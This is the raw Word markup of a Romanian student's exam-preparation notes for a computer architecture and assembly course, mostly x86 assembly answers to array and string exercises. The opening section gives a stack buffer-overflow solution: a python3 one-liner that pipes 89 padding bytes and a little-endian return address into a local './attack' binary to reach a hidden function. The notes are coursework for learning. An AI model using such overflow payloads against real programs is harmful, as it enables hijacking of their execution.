    <w:p w14:paraId="11FD2101" w14:textId="77777777" w:rsidR="00E73B75" w:rsidRPr="0056338F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6338F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36E7E24E" w14:textId="77777777" w:rsidR="00E73B75" w:rsidRPr="0056338F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6338F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56338F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56338F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56338F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78E193FD" w14:textId="77777777" w:rsidR="00E73B75" w:rsidRDefault="00E73B75" w:rsidP="00E73B75"/>
    <w:p w14:paraId="172BE70F" w14:textId="43E25154" w:rsidR="00E73B75" w:rsidRDefault="00E73B75" w:rsidP="00E73B75">
      <w:pPr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</w:rPr>
        <w:t>MODEL 2021-2022</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BE5563E" w14:textId="77777777" w:rsidR="00E73B75" w:rsidRDefault="00E73B75" w:rsidP="00E73B75">
      <w:r w:rsidRPr="003D3A57">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4034F0C1" wp14:editId="4A04EC70">
            <wp:extent cx="5943600" cy="1590040"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1789834398" name="Imagine 1" descr="O imagine care conține text, Font, captură de ecran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34398" name="Imagine 1" descr="O imagine care conține text, Font, captură de ecran&#10;&#10;Descriere generată automa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7B3D" w14:textId="77777777" w:rsidR="00E73B75" w:rsidRDefault="00E73B75" w:rsidP="00E73B75">
      <w:pPr>
        <w:pStyle w:val="Listparagraf"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00C31C1D">
        <w:t xml:space="preserve">python3 -c 'import sys; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C31C1D">
        <w:t>sys.stdout.buffer.write</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C31C1D">
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C31C1D">
        <w:t>b"A</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C31C1D">
        <w:t>"*89 + b"\x76\x84\x04\x08")' | ./attack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70C6B098" w14:textId="77777777" w:rsidR="00E73B75" w:rsidRDefault="00E73B75" w:rsidP="00E73B75">
      <w:pPr>
        <w:pStyle w:val="Listparagraf"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">!!!! merge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asa</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">,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folosim</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> print(…) da </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>segfault</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="720769A5" w14:textId="77777777" w:rsidR="00B46619" w:rsidRDefault="00B46619" w:rsidP="00E73B75"/>
    <w:p w14:paraId="67F3092F" w14:textId="77777777" w:rsidR="00B46619" w:rsidRDefault="00B46619" w:rsidP="00E73B75"/>
    <w:p w14:paraId="2C1CB51D" w14:textId="77777777" w:rsidR="00B46619" w:rsidRDefault="00B46619" w:rsidP="00E73B75"/>
    <w:p w14:paraId="5CE03C52" w14:textId="77777777" w:rsidR="00B46619" w:rsidRDefault="00B46619" w:rsidP="00E73B75"/>
    <w:p w14:paraId="1171A478" w14:textId="645CF2EC" w:rsidR="00E73B75" w:rsidRDefault="00E73B75" w:rsidP="00E73B75">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">89 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>este</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>: (in decimal)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FBF3CC6" w14:textId="77777777" w:rsidR="00E73B75" w:rsidRDefault="00E73B75" w:rsidP="00E73B75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9EF53BD" wp14:editId="2D6C4557">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>29210</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>-113665</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1920875" cy="1106805"/>
                <wp:effectExtent l="38100" t="38100" r="22225" b="36195"/>
                <wp:wrapNone/>
                <wp:docPr id="984495380" name="Cerneală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920875" cy="1106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F35BAF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Cerneală 9" o:spid="_x0000_s1026" type="#_x0000_t75" style="position:absolute;margin-left:1.8pt;margin-top:-9.45pt;width:152.2pt;height:88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DACDF9E" wp14:editId="5C0B6F09">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>1691580</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>855920</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="350280" cy="7920"/>
                <wp:effectExtent l="38100" t="38100" r="50165" b="49530"/>
                <wp:wrapNone/>
                <wp:docPr id="804337569" name="Cerneală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502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B63EB" id="Cerneală 1" o:spid="_x0000_s1026" type="#_x0000_t75" style="position:absolute;margin-left:132.7pt;margin-top:66.95pt;width:28.6pt;height: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">
                <v:imagedata r:id="rId17" o:title=""/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidRPr="007D0389">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3DAFA6C7" wp14:editId="3C0EC1C2">
            <wp:extent cx="5943600" cy="2183765"/>
            <wp:effectExtent l="0" t="0" r="0" b="6985"/>
            <wp:docPr id="326223665" name="Imagine 1" descr="O imagine care conține text, software, Font, număr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23665" name="Imagine 1" descr="O imagine care conține text, software, Font, număr&#10;&#10;Descriere generată automa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6612" w14:textId="77777777" w:rsidR="00E73B75" w:rsidRDefault="00E73B75" w:rsidP="00E73B75">
      <w:r>
        <w:t xml:space="preserve">ACUM PT ADRESA DE INCEPUT A FUNCTIEI </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>invisible_func</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> (de </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>obicei</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> sunt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suspecte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functiile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gasesc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>flagurile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mesajele</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> de </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>afisat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CD7C131" w14:textId="77777777" w:rsidR="00E73B75" w:rsidRDefault="00E73B75" w:rsidP="00E73B75">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Adresa</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> de </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>inceput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:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C1B49FE" w14:textId="77777777" w:rsidR="00E73B75" w:rsidRDefault="00E73B75" w:rsidP="00E73B75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577DD30" wp14:editId="226D528E">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>646430</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>-58420</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="612775" cy="838430"/>
                <wp:effectExtent l="38100" t="38100" r="15875" b="38100"/>
                <wp:wrapNone/>
                <wp:docPr id="199536086" name="Cerneală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12775" cy="8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8FF57" id="Cerneală 18" o:spid="_x0000_s1026" type="#_x0000_t75" style="position:absolute;margin-left:50.4pt;margin-top:-5.1pt;width:49.2pt;height:6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">
                <v:imagedata r:id="rId20" o:title=""/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidRPr="007D0389">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5704DC70" wp14:editId="7089A022">
            <wp:extent cx="5943600" cy="1788160"/>
            <wp:effectExtent l="0" t="0" r="0" b="2540"/>
            <wp:docPr id="1040906359" name="Imagine 1" descr="O imagine care conține text, captură de ecran, software, Fon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06359" name="Imagine 1" descr="O imagine care conține text, captură de ecran, software, Font&#10;&#10;Descriere generată automa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8345" w14:textId="77777777" w:rsidR="00E73B75" w:rsidRDefault="00E73B75" w:rsidP="00E73B75">
      <w:r>
        <w:t xml:space="preserve">Mereu </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>adresa</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> de </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>inceput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in </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>acest</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> loc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stil</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> little endian </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>adica</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00C31C1D">
        <w:t>\x76\x84\x04\x08</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E771B42" w14:textId="77777777" w:rsidR="00B46619" w:rsidRDefault="00B46619" w:rsidP="00E73B75">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="22FE3385" w14:textId="77777777" w:rsidR="00B46619" w:rsidRDefault="00B46619" w:rsidP="00E73B75">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="009320A3" w14:textId="77777777" w:rsidR="00B46619" w:rsidRDefault="00B46619" w:rsidP="00E73B75">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6C9C3711" w14:textId="77777777" w:rsidR="00B46619" w:rsidRDefault="00B46619" w:rsidP="00E73B75">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6020B4A9" w14:textId="77777777" w:rsidR="00B46619" w:rsidRDefault="00B46619" w:rsidP="00E73B75">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7BA2BA6A" w14:textId="3FF97595" w:rsidR="00E73B75" w:rsidRDefault="00E73B75" w:rsidP="00E73B75">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B46619">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>EXAMEN CB1 2022</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06408611" w14:textId="3764BF91" w:rsidR="00737C98" w:rsidRDefault="00737C98" w:rsidP="00E73B75">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>1.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C298EC1" w14:textId="3F956C7B" w:rsidR="00737C98" w:rsidRDefault="00737C98" w:rsidP="00E73B75">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00737C98">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:noProof/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="626F826C" wp14:editId="00172593">
            <wp:extent cx="5943600" cy="1362075"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="832096214" name="Imagine 1" descr="O imagine care conține text, captură de ecran, document, informație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96214" name="Imagine 1" descr="O imagine care conține text, captură de ecran, document, informație&#10;&#10;Descriere generată automa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EA33" w14:textId="1012F2E1" w:rsidR="00737C98" w:rsidRDefault="00737C98" w:rsidP="00E73B75">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>a.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F4C6818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a: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Afisati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restul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impartirii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la 23,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fiecare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element.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="151AD9A8" w14:textId="77777777" w:rsid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</w:t>
      </w:r>
      <w:r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  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61BAA8ED" w14:textId="192C8EE2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 xml:space="preserve">   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,products_len</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="50EF6B42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,[products]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BF290AE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,[answer]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73A5248C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177F7B0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1265D2E9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23</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6759026B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CBEB18A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while1:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AADDFD7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1B70F361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57359386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ax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[products +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3D6959DD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div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0DA9597E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[answer +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dx</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34DAE0F6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loop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while1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="278C284C" w14:textId="67C79E64" w:rsidR="00737C98" w:rsidRDefault="00737C98" w:rsidP="00E73B75">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="07557C8E" w14:textId="63960B05" w:rsidR="00737C98" w:rsidRDefault="00737C98" w:rsidP="00E73B75">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>b.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B2BB2CC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b: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Afisati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produsul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dintre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numarul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elemente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pare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cel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al</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6677126D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 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elementelor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impare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.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Rezultatul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se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pune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pe prima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pozitie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din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vectorul</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="010AC308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answer.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14E8BECF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FECC7D1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products_len</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="79BA803D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02D6AE7B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   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nr pare</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00F06427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   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nr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impare</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="213ED9E1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3394F93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while2:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48AE5BA2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ax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[products +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*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63FE31E7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test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        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daca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are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ultimul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bit 1, e nr impar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29CD4E20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jnz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odd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="443AE7FC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22E27787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skip</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65104CBC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odd:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D5CA835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26ADBFEA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skip:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72A8327F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loop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while2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39A61EB5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</w:p>
    <w:p w14:paraId="34F4E73D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ax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bx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         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fac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inmultirea</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="3257CEB3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mul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dx</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DA18410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[answer],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ax</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68544E40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F652A6F" w14:textId="77777777" w:rsidR="00737C98" w:rsidRDefault="00737C98" w:rsidP="00E73B75">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="202D3188" w14:textId="12CCFEFF" w:rsidR="00737C98" w:rsidRDefault="00737C98" w:rsidP="00E73B75">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>c.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CB8F6BA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c: Daca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elementul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se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afla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pe o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pozitie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multiplu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3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sau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5,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EDDF3BD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verificati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daca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cel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mai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semnificativ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octet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este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par. Daca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este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par</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23DCA661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faceti-i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gram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flip</w:t>
      </w:r>
      <w:proofErr w:type="gram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(ii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inversati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toti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bitii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).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Puneti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rezultatul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fiecarui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flip</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62E78F82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in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vectorul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answer.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="687957E0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22D0A90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   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aici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retin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pozitia</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="64FAF626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products_len</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="0AC206B8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c_answer_len</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="50887E6F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F674E01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iterate:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5928427F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788BDC92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   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pun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pozitia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in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eax</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="2899D676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sub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30C52570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63A18D9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4DD80A88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3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7418EB1B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div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7B0053A1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56954C2F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jne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check_5     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daca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nu e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multiplu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3,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verific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daca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e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multiplu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5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38989B4A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compute</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="518A3528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check_5:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E26201D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57AAD78B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501BD59F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sub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56DF24B4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98FF577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32C8BB89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5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59CF406C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div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7EE75E46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     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daca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nu e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multiplu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5,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trec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la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urmatorul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element</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D18AAFA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jne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do_nothing</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="066402EE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compute:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45D10A3A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7F821B86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bx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[products +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3D66D652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D38DE55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shr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     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caut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cel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mai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semnificativ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octet</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79B634D9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E165E18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test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    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verifica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daca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e par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sau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nu</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B24A2E7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jnz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do_nothing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 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daca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e impar,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trec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mai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departe</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="678A25C6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9D7FD10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bx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[products +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2E142A60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-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256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  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fac flip DOAR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celui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mai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semnificativ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octet</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56AA7D5D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598467A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[answer +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*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bx</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DD4B387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dec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03F80987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737C9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do_nothing</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00737C9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5D923E75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gram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loop</w:t>
      </w:r>
      <w:proofErr w:type="gram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iterate</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E72F41B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881426F" w14:textId="77777777" w:rsidR="00737C98" w:rsidRPr="00737C98" w:rsidRDefault="00737C98" w:rsidP="00E73B75">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="77A5E18E" w14:textId="52F6DCFA" w:rsidR="00737C98" w:rsidRDefault="00737C98" w:rsidP="00E73B75">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>2.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60E553EB" w14:textId="118FDBFC" w:rsidR="00737C98" w:rsidRDefault="00737C98" w:rsidP="00E73B75">
      <w:pPr>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00737C98">
        <w:rPr>
          <w:noProof/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="56F700DA" wp14:editId="62FCE803">
            <wp:extent cx="5943600" cy="1823085"/>
            <wp:effectExtent l="0" t="0" r="0" b="5715"/>
            <wp:docPr id="1685254757" name="Imagine 1" descr="O imagine care conține text, scrisoare, Font, documen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54757" name="Imagine 1" descr="O imagine care conține text, scrisoare, Font, document&#10;&#10;Descriere generată automa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B993" w14:textId="52A19041" w:rsidR="00737C98" w:rsidRDefault="00737C98" w:rsidP="00E73B7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a.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67A0ED85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;TODO a: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Implementati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`char*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read_string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(void)` cu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urmatorul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comportament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:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23C4F53D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-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aloca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memorie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stoca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cel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mult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`N`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octeti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initializati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cu 0.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5600EA8B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-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citeste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la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intrarea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standard un sir de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caractere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dimensiune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cel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mult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`N-1`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il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stocheaza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in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memoria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alocata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7C32B7F9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-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intoarce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adresa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memorie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alocata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mai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sus.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40C8D7B9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-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alocarea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memorie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se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recomanda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folosirea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functiei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`void *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calloc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(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size_t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nmemb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size_t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size);` din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biblioteca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standard.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7408AF3E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lastRenderedPageBreak/>
        <w:t xml:space="preserve">;   -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citirea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la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intrarea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standard se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recomanda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folosirea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functiei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`int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scanf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(const char *format, ...);`</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C37D1F7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47EAEB2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737C9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read_string</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00737C9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1B00C4D3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078B842F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0E5AB507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8DF78A0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       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sizeof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(char)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40237CF9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[N]      </w:t>
      </w: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cati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biti</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="2C7E370C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calloc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="011291FE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 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40776D74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0AECD1D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pusha</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="0CFFABE7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</w:p>
    <w:p w14:paraId="477272A4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0CA4E07D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str_fmt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="2C44C5E5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scanf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="6568BBA7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7DF3F139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27A05B4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popa</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="6E3996BD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258D463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14D89A08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5499E3FF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D872991" w14:textId="77777777" w:rsidR="00737C98" w:rsidRDefault="00737C98" w:rsidP="00E73B75">
      <w:pPr>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6446260E" w14:textId="06B1D584" w:rsidR="00737C98" w:rsidRDefault="00737C98" w:rsidP="00E73B7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b.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4419418A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b: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Implementati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`int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is_vowel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(char c)` care ne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spune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daca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un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caracter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este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vocala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sau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nu.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17F4208E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-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intoarce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1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daca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caracterul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primit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ca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parametru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este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vocala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0 in rest.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B919DC3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-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vocalele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sunt `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aeiou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`.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C5E01D4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-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puteti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folosi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biblioteca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strlen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`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determina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dimensiunea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unui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sir de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caractere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6D79007F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-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este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garantat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ca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parametrul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intrare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fi o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litera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mica </w:t>
      </w:r>
      <w:proofErr w:type="gram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</w:t>
      </w:r>
      <w:proofErr w:type="gram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alfabetului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englezesc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00737C9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56150A49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737C9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is_vowel</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00737C9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00387FFE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1292F537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2AD5EC77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BDD5CE3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264163B5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al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byte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359AD851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06972CC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'a'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3865A7A5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vowel</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EDD2CE0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'e'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="760F4F3C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vowel</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="445FA409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'</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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i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'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2424D532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vowel</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3413B688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'o'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="734E514D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vowel</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E91E545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'u'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E1549ED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vowel</w:t>
      </w:r>
    </w:p>
